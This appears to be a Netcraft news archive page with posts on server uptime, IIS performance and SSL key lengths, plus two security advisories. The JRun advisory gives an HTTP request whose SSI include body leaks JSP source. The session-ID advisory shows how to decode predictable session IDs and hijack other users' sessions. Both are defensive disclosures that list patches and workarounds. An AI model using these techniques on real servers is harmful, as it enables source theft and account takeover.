Windows 2000 site goes over two years without a reboot
22nd January, 2003
This month is the first time that a Windows 2000 site has appeared in the 50 top sites which have the longest period of time since last reboot. www.byteandswitch.com has been running continuously since November 2000. When we first started graphing web servers uptime in the summer of 2000, many people were skeptical that a Windows machine would ever make the top 50. Perceptions change, and although two years is exceptional, several Windows 2000 sites have run for more than a year without a reboot. In the hosting industry, Microsoft partners Interliant and Devine each have sites that have not been rebooted in over a year, while Microsoft has also run several of its own sites for over a year between reboots.
Posted by Mike Prettejohn in Around the Net
Performance of www.intel.com attracting interest
21st January, 2003
www.intel.com is one of a very small number of well known sites running both Windows 2000 and Windows 2003 in a load balanced pool, and has become a tempting target for people to use as a straw in the wind towards the relative performance of the two operating systems. One person mailed us saying he thought that the Intel site's response time had slowed since Intel started using Windows 2003, and asked for confirmation and explanation.
The performance of www.intel.com shows a saw tooth formation, with some responses consistently longer than others. Matching up the response times with the corresponding server signatures actually does confirm that the responses served by Microsoft-IIS/6.0 are consistently longer than those served by Microsoft-IIS/5.0.

Analysing the response time graph more carefully shows that the connection time and time to serve the first byte are consistent across the two sets of servers, but the time to serve the complete request is significantly higher on the Microsoft-IIS/6.0 servers.
London at Mid-day on 16 Jan 2003 by web server | ||
---|---|---|
Server | Microsoft-IIS/5.0 | Microsoft-IIS/6.0 |
Quickest | 1.22 | 2.00 |
Slowest | 1.28 | 2.21 |
Average | 1.25 | 2.09 |
It is important to appreciate that the difference need not be directly caused by the system software. Other plausible reasons could include;
- The hardware specification of the Microsoft-IIS/5.0 machines may be faster than those running Microsoft-IIS/6.0
- The configuration of the systems is likely to be different
- From looking at the tcp/ip characteristics, we think it is likely that the www.intel.com front page is served dynamically, and the migration of the application that generates the dynamic content may have introduced a performance penalty
- The configuration of the local network at Intel may have disadvantaged the Microsoft-IIS/6.0 machines in some way.
Posted by Mike Prettejohn in Dogfood
Security Advisory 2001-11.1 - JRun SSI Request Body Parsing
1st January, 2003
Vulnerable Products: |
JRun Java application server from Allaire. All current versions (with latest security patches as of November 2001) are believed to be affected, including 2.3.3, 3.0, and 3.1. |
Impact: |
Revealing of source code to Java Server Pages, and other protected files inside the web root. |
Affects: |
Web sites using vulnerable products as stated above |
Revision history: |
Vendor notified: 22nd October, 2001 |
Overview
JRun supports a number of different technologies for dynamically generated content, most importantly Java Server Pages. One lesser-used feature is the support for Server Side Includes (SSI); this is a much simpler language than JSP, which is primarily for including the text of other files on the server (for instance adding standard headers or footers to otherwise static pages), and also supports invoking servlets. By default, the file extension .shtml is assigned to the SSI handler.
Unfortunately, a flaw in the server side component that processes requests for SSI pages means that user supplied data can be included in the SSI processing. A remote user can submit requests containing data which will be processed by the SSI filter; as a result the user can cause the server to execute arbitrary SSI code.
Details
When a request for an SSI page is submitted to the server, and the page does not exist, the SSI handler "falls back" on the body of the HTTP request itself. Usually an HTTP request does not contain a body, but a malicious user can easily construct a request with a body containing SSI commands. These can be used to include the source to other files on the server. For example, a request such as:
GET /nosuch.shtml HTTP/1.0 Content Length: 38 <!--#include virtual="/index.jsp"-->
would return the source of the index.jsp
page (subject to SSI
processing - so servlet tags may be replaced, but most JSP source would be
passed through unmodified).
It should be noted that the include
directive does not go through
the usual URL processing - for example includes of .jsp
files are
not done by the JSP handler,
hence the source code to .jsp
's can be obtained.
It also bypasses any access controls enforced by the web server
(so files in protected directories such as the
/WEB-INF/
directory can be accessed).
However, it was not possible to access files outside of the web root in the cases
that Netcraft tested.
Netcraft also verified that it was possible to execute Java servlets on the
server using this vulnerability. As it is common to expose these via
the /servlet/
URL mapping, this does not give the attacker any new
advantage in the normal setup but could be considered a problem by
sites that have disabled the /servlet/
mapping.
Recommendations
As a workaround, sites using JRun can disable the SSI support on the web
server, as this is not required for any other features of the server including
Java Server Pages, so few sites actually require this functionality.
This involves both disabling the .shtml extension mapping to SSI handling,
and the /servlet/
method of invoking the servlet which does SSI
processing
(the latter can be done by either disabling the /servlet/ mapping if it is not
used, or by blocking access to the particular servlet affected -
allaire.jrun.ssi.SSIFilter for JRun 3.x,
com.livesoftware.jrun.plugins.ssi.SSIFilter on JRun 2.3.x).
See the security bulletin from Allaire for detailed information on making this
configuration change.
Vendor Patches and Comments
Allaire have responded promptly to Netcraft's initial report of this problem. They have confirmed that this is a security problem in the JRun versions listed. A patch is expected to be included in the next rollup patch for JRun. In the meantime they have released a security bulletin to notify customers of this problem, and advise a workaround by disabling SSI.
Disclaimer
This information is provided on an AS IS basis in the hope that it is useful in securing vulnerable computer systems; however Netcraft cannot guarantee its accuracy or accept responsibility for any damage resulting from the release of this advisory.
Netcraft
This is one of many vulnerabilities tested by Netcraft's security testing services. Please see http://news.netcraft.com/archives/security.html for more information.
Posted by Martyn Tovey in Security
Security Advisory 2001-01.1 - Predictable Session IDs
1st January, 2003
Vulnerable Products: |
Java Application Servers based on Sun's reference implementation of the Java Servlet Developers Kit (JSDK 2.0), without enhancements to the session management code, may be vulnerable. The following products are affected:
|
Not Vulnerable: |
Products based on JSDK V2.1 (onward), which uses a different algorithm, or products that conform to the 2.x Java Servlet API but use custom session management code. |
Impact: |
Hijacking of user sessions |
Affects: |
Websites using vulnerable products as stated above |
Revision history: |
Released to Vendors: 6th November 2000 |
Overview
Many websites support the idea of user sessions - each user connecting to the site is issued with a unique session ID, which is then used to identify all subsequent requests made by that user, either encoded in the URLs, or as a cookie. The server can then store data for each user session, for instance the state of a web shopping cart. Session IDs are also often used to control access to sites requiring a login; instead of sending the username/password with every request, the site issues a session ID after the user logs on, which identifies the user for the rest of the session.
With some server session management systems, it is possible for a user who can connect to the server and get a session ID, to guess other users' session IDs. If successful, the attacker can then view any page, take any action, post to any form etc, that the real user of that session could.
This attack requires no IP spoofing or session snooping. It works against sites using SSL. Netcraft has successfully proven this attack against machines using cookie-based and URL rewriting-based session management.
Details
From a security point of view, the important properties of a session ID should be that it is unique, and it is not possible for one user to guess another user's session ID.
One way to ensure uniqueness is to include a session counter or timestamp in the session ID. In particular, for the sites we found to be vulnerable, the session ID included:
- A session counter
- The IP address of the server
- A value made by combining the date, session counter, and current system time in milliseconds (we'll call this the timestamp)
This certainly appears sufficient to ensure uniqueness. However, if one user can get this information out of his session ID, he can clearly use it to guess other users' session IDs.
Encoding of Session IDs
For servers Netcraft has identified as vulnerable, the session ID is encoded using a simple rule. 5 bits at a time are taken from the binary session ID; these 5 bits form a number between 0 and 31. Numbers 0-25 are encoded with the corresponding letters A-Z; numbers 26-31 are encoded by the digits 0-5 respectively. It's a kind of "base32" encoding - which can be decoded trivially.
Here's a typical session ID being decoded:
$ echo -n "FGAZOWQAAAK2RQFIAAAU45Q" | ./base32.pl -d 29 81 97 5a 00 00 15 c8 c0 a8 00 01 4f 7e
This breaks up as: (all integers are in network byte order)
- Bytes 0-3: Timestamp
- Bytes 4-7: Session count
- Bytes 8-11: IP address of the server issuing the session ID
- Bytes 12-13: Random number (or zero, see below)
The Attack
We now know everything we need to try to hijack another user's session. The timestamp is always increasing, the session count simply increments, and the internal server IP address is constant. If we make two requests to the server, and the session count of the second request is more than 1 higher than the session count of the first, then we know that another session has started in between. We know also that the timestamp of that session will be between our two timestamps.
The two "random bytes" might have been a stumbling block, but:
- The random bytes are not used by all servers, in which case they are zero.
- For many servers tried, the random bytes are only generated when the server is started; they are the same for all user sessions.
For example, a couple of consecutive session IDs from a website might be something like this:
$ perl -e 'print "HEAD / HTTP/1.0\n\n"' | \ nc www.example.com 80 | grep sessionid Set-cookie: sessionid=FGAZOWQAAAK2RQFIAAAU45Q;path=/ $ ./decode-sessionid.pl -s FGAZOWQAAAK2RQFIAAAU45Q SessionID gives: Thu Oct 12 12:34:06 2000, session count = 5576, IP Address = 192.168.0.1 Extra = 4f (79) 7e (126) $ perl -e 'print "HEAD / HTTP/1.0\n\n"' | \ nc www.example.com 80 | grep sessionid Set-cookie: sessionid=FGFLIHYAAALJVQFIAAAU45Q;path=/ $ ./decode-sessionid.pl -s FGFLIHYAAALJVQFIAAAU45Q SessionID gives: Thu Oct 12 12:38:44 2000, session count = 5786, IP Address = 192.168.0.1 Extra = 4f (79) 7e (126)
Note that all session IDs in this report were obtained from real servers, but have been modified to avoid naming those servers. The name of the session ID is usually, but not always, "sessionid", "sesessionid", "JSESSIONID" or "jwssessionid".
The random extra bytes don't seem to be very random, but you do need to watch out for load-balanced servers, as each will have different counts and random elements.
Consequences
Once an attacker has guessed another user's session ID, they have full access to that user's session (assuming the session ID is the sole identifier for session management and security purposes, which it is on many sites). If the service provides a means of "logging out", then the session ID is only useful until the real user logs out. Until then you can (typically) view any page, take any action, post to any form etc, that the real user can on the site. And the real user will be unaware of this (until some action you take has a visible result to the real user). Basically, it's very bad news.
Of course, the fact that the session IDs leak your internal IP addresses and, perhaps more importantly from the business point of view, the server's session count (easy way to track the popularity of competitors' sites) is in itself a cause for concern.
Testing Vulnerability
There are a large number of servers on the Internet using session ID cookies or URL re-writing encoded in this fashion. The easiest way to identify such sites is to find a page on the site which generates a session ID (often this is either the home page, or the page which processes logins), then make a few requests to this page, and compare the session IDs, looking for the incrementing session count.
Netcraft is reluctant to give a more exact test here, because it could lead to a false sense of security for administrators whose sites don't display the behaviour described above. Netcraft has seen some variations on the basic theme (e.g. some servers have longer session IDs than those described here, but the extra data appears constant).
Recommendations
- There should be some real random input to the session IDs if they are to be used as the sole means of session tracking and management.
- Any meaningful data being used in session IDs should be one-way encrypted. You shouldn't be trusting users to play fair with this information.
Recent versions of Sun's Java servlet code (from version 2.1) use a new session ID system, which includes a large random component. However, developers building application servers should enhance the code to make the session count inaccessible.
The Apache Tomcat project, starting with Tomcat version 3.2, uses a secure random number generator, and maintains uniqueness of session IDs without leaking the session count.
Vendor Patches and Comments
ATG
Bug numbers:
Dynamo 5.1, Dynamo 5.0 Patch 2 - Bug #29826
Dynamo 4.5.1 Patch 5 - Bug #25925
Dynamo 4.1.0 Patch 9 - Bug #31956
Dynamo 4.0.1 Patch 4 - Bug #31957
Dynamo 3.5.1 Patch 8 - Bug #32277
Versions affected:
Dynamo 3.5.1, Dynamo 3.5.1 Patch 1 through 7
Dynamo 4.0.1, Dynamo 4.0.1 Patch 1 through 3
Dynamo 4.1.0, Dynamo 4.1.0 Patch 1 through 8
Dynamo 4.5.0, Dynamo 4.5.0 Patch 1 through 5
Dynamo 4.5.1, Dynamo 4.5.1 Patch 1 through 4
Dynamo 5.0, Dynamo 5.0 Patch 1
Versions not affected:
Dynamo 5.1, Dynamo 5.0 Patch 2 and all future releases
Dynamo 4.5.1 Patch 5 and all future releases
Dynamo 4.1.0 Patch 9 and all future releases
Dynamo 4.0.1 Patch 4 and all future releases
Dynamo 3.5.1 Patch 8 and all future releases
Patch location:
Available to registered users in the support area on atg.com, under "Dynamo Patches".
Dynamo 5.1, Dynamo 5.0 Patch 2, Dynamo 4.5.1 Patch 5 are available as of 20th December, 2000.
Dynamo 3.5.1 through 4.1.0 patches should be available in mid-January 2001.
IBM
"With V2.x, we have always had hooks in the HttpSession support to allow applications to associate authentication information with a session and prevent access to that session if the right credentials are not provided. For customer applications who could not do this, we earlier this year provided a V2.x patch which further 'randomizes' the session ID, using a triple DES encryption ID generation algorithm.
With V3.x, we feel we have always prevented this issue - There is built in coupling between the HttpSession and WebSphere security, where authentication is automatically associated with the session and thus is used to prevent all unauthenticated access. One can review the WebSphere documentation to review all the various means available for securely maintaining this authorization."
E-fix PQ47663 is now available for version 3.02 and 3.5.x of WebSphere. For version 2, ask WebSphere support for the "version 2 HttpSession ID randomization change".
Sun Microsystems
For Java Web Server 1.1.1 or 1.1.2, first upgrade the Java Web Server and than install the appropriate patch:
Version 2.0 Patch 4
Version 1.1.3 Patch 4
Patches available from http://www.sun.com/software/jwebserver/upgrade/index.html.
Disclaimer
This information is provided on an AS IS basis in the hope that it is useful in securing vulnerable computer systems; however Netcraft cannot guarantee its accuracy or accept responsibility for any damage resulting from the release of this advisory.
Netcraft
For more information on Netcraft security services, please see http://news.netcraft.com/archives/security.html
Posted by Martyn Tovey in Security
Solaris sites curiously slow to upgrade
30th September, 2002
A couple of months ago we highlighted the low numbers of sites migrating to Apache/2.0, and contrasted it with the speed at which site administrators adopted Apache/1.3.26 which contained a fix for a potential buffer overflow problem.
If anything more surprising is the slow adoption of new versions of Sun's Solaris operating system. Solaris 9, released in May this year, is running on fewer than 1000 web site ip addresses found by the September survey, and there are roughly twice as many sites running Solaris 2 & Solaris 7 as are running Solaris 8, released in March 2000.
|
Historically, slowness to gather upgrade revenue has usually been a portent of trouble to come for web technology vendors, and the figures coincide with Sun's difficulties generating revenue and profits over the last eighteen months. By contrast, Windows .Net Server, which is not yet scheduled for release, has almost as many as ip addresses as Solaris 9, including some impressive, high volume sites, such as Nasdaq.
Sun would reasonably point out that their boxes typically cost a lot more, and the upgrade cycle for more expensive kit could be expected to be slower.
Posted in Other
Crypto Regulations Cast Long Shadow
11th March, 2002
Recently, the strength of SSL key lengths has been the subject of heated debate in security circles, after Nicko van Someren disclosed that he is able to break 512-bit keys in around six weeks, using conventional office computers.
The analysis focuses on the key length used for the server's public key (the key which is used to prove the authenticity of the server to web browsers). The longer the key, the harder it is for an attacker to break the key - if this key is broken, it can compromise both past and future secure browsing sessions, and allow the attacker to impersonate the server. Most experts currently recommend a key length of at least 1024 bits as secure and some of the strongest debate has concerned the perceived safety of these 1024 bit keys.
However, a more timely aspect to the work is to highlight the number of SSL servers currently in use on the internet, and their geographical location.
Although US export restrictions on strong cryptography have been relaxed in recent years, data collected as part of our SSL Server Survey shows that the US export legislation and locally acted legislation to restrict the use of cryptography in countries with repressive or eccentric administrations, does still cast a shadow over the security of ecommerce even years after the acts have been repealed.
Country | Percentage of sites with short keys |
---|---|
Canada | 13.5% |
USA | 15.1% |
UK | 26.5% |
Spain | 31.9% |
France | 41.1% |
Internet-wide, around 18% of SSL Servers use potentially vulnerable key lengths. However, these tend to be concentrated in geographical areas outside the United States and its close trading partners. In the US, where over 60% of SSL sites are situated, and Canada only around 15% of sites are using short keys. In most European countries over 25% are still using short keys, and in France, which had laws restricting the use of cryptography until relatively recently, over 40% of sites are using short keys.
US export regulations (described in detail by the crypto law survey) have had a discernable impact in slowing use of strong cryptography outside of the States. One reason export grade cryptography remains quite common is that the relative weakness of the server's choice of cryptography is not obvious to the end user, so there is so little pressure to make the change. Browser developers are in a position to help change this, perhaps by displaying a graded indication of key length rather than the present lock symbol displayed on all SSL sessions regardless of strength.